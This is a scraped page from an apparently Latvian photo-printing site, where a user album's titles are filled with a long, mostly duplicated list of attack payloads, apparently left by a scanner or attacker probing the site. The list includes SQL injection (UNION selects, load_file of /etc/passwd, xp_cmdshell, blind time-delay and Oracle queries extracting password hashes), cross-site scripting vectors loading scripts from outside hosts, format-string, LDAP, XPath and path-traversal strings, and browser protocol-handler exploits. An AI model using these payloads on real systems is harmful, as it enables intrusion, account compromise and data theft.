My Photos

All your pictures in one place

The “My Photos” section lets you easily store, organize, and manage your pictures. Upload new photos, create albums, and choose your best shots for printing or gifts.

Latviski По-русски

	Create account
	Upload photos
	Online shop
	Pricing & services
	Studio addresses

	User albums
	History of Latvia
	Announcement

Users / A / AivarsSlucis

About user

Send link

Personal exhibition

" or isNULL(1/0) /*

" or isNULL(1/0) /*

" or isNULL(1/0) /*

" or isNULL(1/0) /*

%#0123456x%08x%x%s%p%d%n%o %u%c%h%l%q%j%z% z%t%i%e%g%f%a%c %s%08x%%

%08x

%08x

%26%2339);x=ale rt;x(%26%2340 /finally through!/.sour ce %26%2341);//

%26%2339);x=ale rt;x(%26%2340 /finally through!/.sour ce %26%2341);//

%99999999999s

%p%p%p%p%p%p%p% p%p%p

%p%p%p%p%p%p%p% p%p%p

%s%s%s%s%s%s%s% s%s%s%s%s%s%s%s %s%s%s%s%s%s%s% s%s%s%s%s%s%s%s %s%s%s%s%s%s%s% s%s%s%s%s%s%s%s %s%s%s%s%s

%s%s%s%s%s%s%s% s%s%s%s%s%s%s%s %s%s%s%s%s%s%s% s%s%s%s%s%s%s%s %s%s%s%s%s%s%s% s%s%s%s%s%s%s%s %s%s%s%s%s

%s%s%s%s%s%s%s% s%s%s

%x%x%x%x%x%x%x% x%x%x%x%x%x%x%x %x%x%x%x%x%x%x% x%x%x%x%x%x%x%x %x%x%x%x%x%x%x% x%x%x%x%x%x%x%x %x%x%x%x%x

<!--[i f gte IE 4]>; <SCRIPT>al ert('XSS'; );</SC

<!--[i f gte IE 4]>; <SCRIPT>al ert('XSS'; );</SC

</TITLE 2;<SCRIPT>al ert("XSS"; );</SCRIPT&# 62;

</TITLE 2;<SCRIPT>al ert("XSS"; );</SCRIPT&# 62;

<<SCRIPT>;al ert("XSS"; );/ /<</SCRIPT&# 62;

<<SCRIPT>;al ert("XSS"; );/ /<</SCRIPT&# 62;

<BASE HREF=" javascript: alert('XSS' );/ /">

<BASE HREF=" javascript: alert('XSS' );/ /">

<BODY BACKGROUND= ;"javascrip t:alert(';XSS' );" >

<BODY BACKGROUND= ;"javascrip t:alert(';XSS' );" >

<BR SIZE=" &{;aler t(';XSS' )};" ;>

<BR SIZE=" &{;aler t(';XSS' )};" ;>

<DIV STYLE=" ;background-ima ge: url(javascript&#5 8;alert0;'XSS' )

<DIV STYLE=" ;width:; expression(alert('XSS' )); ">

<DIV STYLE=" ;background-ima ge: url(javascript&#5 8;alert0;'XSS' )

<DIV STYLE=" ;width:; expression(alert('XSS' )); ">

<HTML xmlns:xss& #62; <?import namespace= "xss" implementation ="ht

<HTML xmlns:xss& #62; <?import namespace= "xss" implementation ="ht

<IFRAME SRC="j avascript:a lert('XSS9; );" ></IFRAME&

<IFRAME SRC="j avascript:a lert('XSS9; );" ></IFRAME&

<IMG DYNSRC=; 4;javascript 8;alert0;'XSS' );" >

<IMG DYNSRC=; 4;javascript 8;alert0;'XSS' );" >

<IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " 

<IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " 

<IMG SRC="j avascript:a lert('XSS9; );" >

<IMG SRC="h ttp:/&# 47;www.thesitey ouareon.com/ ;somecommand.ph p?somevaria bl

<IMG SRC='v bscript8;msg box("XSS"; )'>

<IMG SRC="l ivescript:& #91;code]&# 34;>

<IMG SRC=javasc ript:alert& #40;" ;XSS&quot&# 59;)>

<IMG SRC="j av ascript8;al ert('XSS'; );" >

<IMG SRC="j av&5;x0A;ascript& #58;alert('XSS' );" >

<IMG SRC="j avascript:a lert('XSS9; )"

<IMG SRC="j avascript:a lert('XSS9; );" >

<IMG SRC="h ttp:/&# 47;www.thesitey ouareon.com/ ;somecommand.ph p?somevaria bl

<IMG SRC='v bscript8;msg box("XSS"; )'>

<IMG SRC="l ivescript:& #91;code]&# 34;>

<IMG SRC=javasc ript:alert& #40;" ;XSS&quot&# 59;)>

<IMG SRC="j av ascript8;al ert('XSS'; );" >

<IMG SRC="j av&5;x0A;ascript& #58;alert('XSS' );" >

<IMG SRC="j avascript:a lert('XSS9; )"

<LINK REL="s tylesheet" HREF=" http:/& #47;testsite.co m/xss.css&# 34

<LINK REL="s tylesheet" HREF=" http:/& #47;testsite.co m/xss.css&# 34

<META HTTP-EQUIV= ;"refresh&# 34; CONTENT1;&# 34;0;url=j avascript:a lert(&

<META HTTP-EQUIV= ;"refresh&# 34; CONTENT1;&# 34;0; URL=http&# 58;//&# 59;U

<META HTTP-EQUIV= ;"Link" Content1;&# 34;<http:7 ;/testsite. com/xs

<META HTTP-EQUIV= ;"refresh&# 34; CONTENT1;&# 34;0;url=j avascript:a lert(&

<META HTTP-EQUIV= ;"refresh&# 34; CONTENT1;&# 34;0; URL=http&# 58;//&# 59;U

<META HTTP-EQUIV= ;"Link" Content1;&# 34;<http:7 ;/testsite. com/xs

<SCRIPT a="; 2;" SRC="h ttp:/&# 47;testsite.com /xss.js" ;>&

<SCRIPT a=";bla h" '' SRC="h ttp:/&# 47;testsite.com /xss.js&

<SCRIPT a=`; 2;` SRC="h ttp:/&# 47;testsite.com /xss.js" ;>&

<SCRIPT a="; 2;'2; 4; SRC="h ttp:/&# 47;testsite.com /xss.js&

<SCRIPT a="; 2;" SRC="h ttp:/&# 47;testsite.com /xss.js" ;>&

<SCRIPT a=";bla h" '' SRC="h ttp:/&# 47;testsite.com /xss.js&

<SCRIPT a=`; 2;` SRC="h ttp:/&# 47;testsite.com /xss.js" ;>&

<SCRIPT a="; 2;'2; 4; SRC="h ttp:/&# 47;testsite.com /xss.js&

<SCRIPT SRC=http&# 58;//te stsite.com/ xss.js>;</;SCRIPT&# 62;

<SCRIPT SRC=http&# 58;//te stsite.com/ xss.js

<SCRIPT SRC=http&# 58;//te stsite.com/ xss.js>;</;SCRIPT&# 62;

<SCRIPT SRC=http&# 58;//te stsite.com/ xss.js

<SCRIPT/XS S SRC="h ttp:/&# 47;testsite.com /xss.js" ;><;/SCRIP

<SCRIPT/XS S SRC="h ttp:/&# 47;testsite.com /xss.js" ;><;/SCRIP

<SCRIPT>a& #61;/XSS 7; alert(a.source) </SCRIPT&# 62;

<SCRIPT>a& #61;/XSS 7; alert(a.source) </SCRIPT&# 62;

<STYLE TYPE=" text/javasc ript">a lert('XSS9; );</STY

<STYLE type=" text/css 4;>BODY 3;background 8;url("javascri pt:

<STYLE TYPE=" text/javasc ript">a lert('XSS9; );</STY

<STYLE type=" text/css 4;>BODY 3;background 8;url("javascri pt:

<TABLE BACKGROUND= ;"javascrip t:alert(';XSS' )"> </TABLE&

<TABLE BACKGROUND= ;"javascrip t:alert(';XSS' )"> </TABLE&

<XML ID=4;xs s">;<I2;<B><IMG SRC="j avas<!-- --&#

<XML ID=4;xs s">;<I2;<B><IMG SRC="j avas<!-- --&#

<XSS STYLE=" ;xss:expres sion(alert('XSS9; ))" >

<XSS STYLE=" ;behavior: url(http:7 ;/testsite. com/xss.htc );&

<XSS STYLE=" ;xss:expres sion(alert('XSS9; ))" >

<XSS STYLE=" ;behavior: url(http:7 ;/testsite. com/xss.htc );&

' -- &password=

' -- &password=

' and 1=( if((load file( char(110,46,101,120,116))char(39, 39)),1,0));

' and 1=( if((load file( char(110,46,101,120,116))char(39, 39)),1,0));

' and 1=0) union all

' and 1=0) union all

' AND 1=utl inaddr.g et host address ((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i

' AND 1=utl inaddr.g et host address ((SELECT SYS.DATABASE N AME FROM DUAL)) AND 'i'='i

' AND 1=utl inaddr.g et host address ((SELECT global name FROM global name)) AND 'i'='i

' AND 1=utl inaddr.g et host address ((SELECT COUNT(DISTINCT (PASSWORD)) FROM SYS.USER$)) AND 'i'='i

' AND 1=utl inaddr.g et host address ((SELECT COUNT(DISTINCT (column name)) FROM sys.all tab co lumns))

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(USERN AME) FROM (SELECT DISTINCT(USERN AME), ROWN

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(table name) FROM (SELECT DISTINCT(table name),

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(grant ed role) FROM (SELECT DISTINCT(grant ed rol

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(PASSW ORD) FROM (SELECT DISTINCT(PASSW ORD), ROWN

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(colum n name) FROM (SELECT DISTINCT(colum n name)

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(USERN AME) FROM (SELECT DISTINCT(USERN AME), ROWN

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(table name) FROM (SELECT DISTINCT(table name),

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(grant ed role) FROM (SELECT DISTINCT(grant ed rol

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(PASSW ORD) FROM (SELECT DISTINCT(PASSW ORD), ROWN

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(colum n name) FROM (SELECT DISTINCT(colum n name)

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(USERN AME) FROM (SELECT DISTINCT(USERN AME), ROWN

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(table name) FROM (SELECT DISTINCT(table name),

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(grant ed role) FROM (SELECT DISTINCT(grant ed rol

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(PASSW ORD) FROM (SELECT DISTINCT(PASSW ORD), ROWN

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(colum n name) FROM (SELECT DISTINCT(colum n name)

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(USERN AME) FROM (SELECT DISTINCT(USERN AME), ROWN

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(table name) FROM (SELECT DISTINCT(table name),

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(grant ed role) FROM (SELECT DISTINCT(grant ed rol

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(PASSW ORD) FROM (SELECT DISTINCT(PASSW ORD), ROWN

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(colum n name) FROM (SELECT DISTINCT(colum n name)

' AND 1=utl inaddr.g et host address ((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i

' AND 1=utl inaddr.g et host address ((SELECT SYS.DATABASE N AME FROM DUAL)) AND 'i'='i

' AND 1=utl inaddr.g et host address ((SELECT global name FROM global name)) AND 'i'='i

' AND 1=utl inaddr.g et host address ((SELECT COUNT(DISTINCT (PASSWORD)) FROM SYS.USER$)) AND 'i'='i

' AND 1=utl inaddr.g et host address ((SELECT COUNT(DISTINCT (column name)) FROM sys.all tab co lumns))

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(USERN AME) FROM (SELECT DISTINCT(USERN AME), ROWN

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(table name) FROM (SELECT DISTINCT(table name),

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(grant ed role) FROM (SELECT DISTINCT(grant ed rol

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(PASSW ORD) FROM (SELECT DISTINCT(PASSW ORD), ROWN

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(colum n name) FROM (SELECT DISTINCT(colum n name)

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(USERN AME) FROM (SELECT DISTINCT(USERN AME), ROWN

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(table name) FROM (SELECT DISTINCT(table name),

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(grant ed role) FROM (SELECT DISTINCT(grant ed rol

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(PASSW ORD) FROM (SELECT DISTINCT(PASSW ORD), ROWN

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(colum n name) FROM (SELECT DISTINCT(colum n name)

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(USERN AME) FROM (SELECT DISTINCT(USERN AME), ROWN

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(table name) FROM (SELECT DISTINCT(table name),

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(grant ed role) FROM (SELECT DISTINCT(grant ed rol

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(PASSW ORD) FROM (SELECT DISTINCT(PASSW ORD), ROWN

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(colum n name) FROM (SELECT DISTINCT(colum n name)

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(USERN AME) FROM (SELECT DISTINCT(USERN AME), ROWN

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(table name) FROM (SELECT DISTINCT(table name),

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(grant ed role) FROM (SELECT DISTINCT(grant ed rol

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(PASSW ORD) FROM (SELECT DISTINCT(PASSW ORD), ROWN

' AND 1=utl inaddr.g et host address ((SELECT DISTINCT(colum n name) FROM (SELECT DISTINCT(colum n name)

' group by userid having 1=1--

' group by userid having 1=1--

' having 1=1--

' having 1=1--

' or '1'='1

' or '1'='1

' or '7659'='7659

' or '7659'='7659

' or 'a'='a

' or 'a'='a

' or 'text' = n'text'

' or 'text' = n'text'

' or 'unusual' = 'unusual'

' or 'unusual' = 'unusual'

' or 'whatever' in ('whatever')

' or 'whatever' in ('whatever')

' or 1 in (select @@version)--

' or 1 in (select @@version)--

' or 1=1 --

' or 1=1 --

' or username is not NULL or username = '

' or username is not NULL or username = '

' or username like char(37);

' or username like char(37);

' select * from information sc hema.tables--

' select * from information sc hema.tables--

' union (select NULL, (select @@version)) --

' union (select NULL, NULL, NULL, (select @@version)) --

' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --

' union (select NULL, (select @@version)) --

' union (select NULL, NULL, NULL, (select @@version)) --

' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --

' union select

' union select

' union select 1,load file('/ etc/passwd'),1, 1,1;

' union select 1,load file('/ etc/passwd'),1, 1,1;

'';!--"=&()

'';!--"=&()

') or ('a'='a

') or ('a'='a

'; exec ('sel' + 'ect us' + 'er')

'; exec ('sel' + 'ect us' + 'er')

'; exec master..xp cmd shell 'ping 10.10.1.2'--

'; exec master..xp cmd shell 'ping 10.10.1.2'--

'; if not((select serverproperty ('isintegrateds ecurityonly')) 1) waitfor delay '0:0:2' --

'; if not((select serverproperty ('isintegrateds ecurityonly')) 1) waitfor delay '0:0:2' --

'; if not(select system user) 'sa' waitfor delay '0:0:2' --

'; if not(select system user) 'sa' waitfor delay '0:0:2' --

'; if not(substring( (select @@version),25, 1) 0) waitfor delay '0:0:2' --

'; if not(substring( (select @@version),25, 1) 8) waitfor delay '0:0:2' --

'; if not(substring( (select @@version),25, 1) 0) waitfor delay '0:0:2' --

'; if not(substring( (select @@version),25, 1) 8) waitfor delay '0:0:2' --

';//%0da=eval;b=aler t;a(b(9));//

';//%0da=eval;b=aler t;a(b(9));//

';alert(0)//\';alert(1) //";alert(2)//\ ";alert(3)//--> ">'>alert(4)=&alert(5)");

';alert(0)//\';alert(1) //";alert(2)//\ ";alert(3)//--> ">'>alert(4)=&alert(5)");

'];a=eval;b=ale rt;a(b(15));//

'];a=eval;b=ale rt;a(b(15));//

'||(elt(-3+5,bi n(15),ord(10),hex(char(45) )))

'||(elt(-3+5,bi n(15),ord(10),hex(char(45) )))

'||utl http.req uest('httP://19 2.168.1.1/')||'

'||utl http.req uest('httP://19 2.168.1.1/')||'

';a=eval;b=aler t;a(b(13));//

';a=eval;b=aler t;a(b(13));//

(1?(1?a:1?""[1?"ev\a \l":0](1?"\a\lert": 0):0:0).a:0)[1?"\c\a\l\l" :0](content,1?"x \s\s":0)

(1?(1?a:1?""[1?"ev\a \l":0](1?"\a\lert": 0):0:0).a:0)[1?"\c\a\l\l" :0](content,1?"x \s\s":0)

*(|(objectclass =*))

*(|(objectclass =*))

*)(uid=*))(|(ui d=*

*)(uid=*))(|(ui d=*

*/*

*/*

*/a=eval;b=aler t;a(b(/e/.sourc e));/*

*/a=eval;b=aler t;a(b(/e/.sourc e));/*

/../.. /../../../boot .ini

/../.. /../../../boot .ini

000%3cs%3e111%3c/ s%3e%3c%73%3e%3 2%32%32%3c%2f%7 3%3e<&#115>1& #5130/s>& #x3c&#

000%3cs%3e111%3c/ s%3e%3c%73%3e%3 2%32%32%3c%2f%7 3%3e<&#115>1& #5130/s>& #x3c&#

1 and user name() = 'dbo'

1 and user name() = 'dbo'

1 and user name() = 'dbo'

1 and user name() = 'dbo'

1 union all select 1,2,3,4,5,6,na me from sysobjects where xtype = 'u' --

1 union all select 1,2,3,4,5,6,na me from sysobjects where xtype = 'u' --

1'1

1'1

1;a=eval;b=aler t;a(b(/c/.sourc e));

1;a=eval;b=aler t;a(b(/c/.sourc e));

1\'1

1\'1

23 or 1=1; --

23 or 1=1; --

>"'

>"'

@import'http:// ha.ckers.org/xs s.css';

@import'http:// ha.ckers.org/xs s.css';

@im\port'\ja\va sc\ript:alert(" XSS")';

@im\port'\ja\va sc\ript:alert(" XSS")';

@im\port'\ja\va sc\ript:alert(" XSS")';

@im\port'\ja\va sc\ript:alert(" XSS")';

@var select @var as var into temp end --

@var select @var as var into temp end --

a' or 1=1; --

a' or 1=1; --

A=alert;A(1)

A=alert;A(1)

aaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaa

aim: &c:\windows\sy stem32\calc.exe " ini="C:\Docume nts and Settings\All Users\Start Menu\Programs\ Sta

aim: &c:\windows\sy stem32\calc.exe " ini="C:\Docume nts and Settings\All Users\Start Menu\Programs\ Sta

aim: &c:\windows\sy stem32\calc.exe " ini="C:\Docume nts and Settings\All Users\Start Menu\Programs\ Sta

alert('xss')

alert('xss')

alert('XSS');

alert('XSS');

alert(document. cookie);

alert(document. cookie);

anything' or 'x'='x

anything' or 'x'='x

BODYbackground:url ("javascript:al ert('XSS')")

BODYbackground:url ("javascript:al ert('XSS')")

copy

copy

count(/child::n ode())

count(/child::n ode())

create user name identified by pass123 temporary tablespace temp default tablespace users;

create user name identified by pass123 temporary tablespace temp default tablespace users;

exec sp addlogin 'name' , 'password'

exec sp addlogin 'name' , 'password'

firefoxurl:test |"%20-new-window%20javascript:ale rt(\'Cross%2520Browser%2520Scripting!\'); "

firefoxurl:test |"%20-new-window%20javascript:ale rt(\'Cross%2520Browser%2520Scripting!\'); "

get

get

head

head

httP://aa">aler t(123)

httP://aa">aler t(123)

httP://aaalert( 123)

httP://aaalert( 123)

insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass 123'))

insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass 123'))

insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65)

insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65)

keks

li list-style-ima ge: url("javascrip t:alert('XSS')" );XSS

li list-style-ima ge: url("javascrip t:alert('XSS')" );XSS

lock

lock

navigatorurl:te st" -chrome "javascript:C= Components.clas ses;I=Component s.interfaces;fi le=C[\'@mozill

navigatorurl:te st" -chrome "javascript:C= Components.clas ses;I=Component s.interfaces;fi le=C[\'@mozill

navigatorurl:te st" -chrome "javascript:C= Components.clas ses;I=Component s.interfaces;fi le=C[\'@mozill

